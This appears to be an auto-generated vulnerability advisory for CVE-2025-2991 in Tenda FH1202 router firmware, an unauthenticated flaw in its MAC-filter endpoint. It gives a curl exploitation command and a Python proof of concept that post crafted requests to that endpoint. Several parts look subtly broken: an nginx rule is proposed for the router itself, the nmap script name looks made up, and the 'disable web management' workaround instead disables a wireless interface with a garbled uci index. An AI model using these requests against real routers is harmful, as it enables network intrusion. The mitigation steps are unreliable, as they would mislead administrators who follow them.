Tenda FH1202, Improper Access Control, CVE-2025-2991 (Critical)

How CVE-2025-2991 Works

The vulnerability in Tenda FH1202 firmware v1.2.0.14(408) stems from improper access controls in the `/goform/AdvSetWrlmacfilter` endpoint of the web management interface. Attackers can remotely exploit this flaw by sending crafted HTTP requests without authentication, bypassing MAC address filtering restrictions. The lack of proper session validation allows unauthorized manipulation of wireless client access rules, potentially enabling network infiltration or MITM attacks.

DailyCVE Form

Platform: Tenda FH1202
Version: 1.2.0.14(408)
Vulnerability: Improper Access Control
Severity: Critical
Date: 04/07/2025

What Undercode Say:

Exploitation:

curl -X POST "http://<Tenda_IP>/goform/AdvSetWrlmacfilter" \
-d "mac=ATTACKER_MAC&action=add"

Detection:

nmap -p 80 --script http-vuln-cve2025-2991 <target_IP>

Mitigation:

1. Apply vendor firmware patch immediately.

2. Block external access to `/goform/AdvSetWrlmacfilter` via ACL:

location /goform/AdvSetWrlmacfilter { deny all; }

3. Network segmentation:

iptables -A FORWARD -p tcp --dport 80 -d <Tenda_IP> -j DROP

PoC (Python):

import requests
exploit_url = "http://target_ip/goform/AdvSetWrlmacfilter"
payload = {"mac":"11:22:33:44:55:66", "action":"add"}
response = requests.post(exploit_url, data=payload)
print(response.text)

Log Analysis:

grep "AdvSetWrlmacfilter" /var/log/nginx/access.log | awk '{print $1}' | sort -u

Firmware Verification:

openssl dgst -sha256 FH1202_Firmware_v1.2.0.16.bin

Temporary Workaround:

Disable web management interface:

uci set wireless.@wifi-iface[bash].disabled=1
uci commit
/etc/init.d/network restart

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2991
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top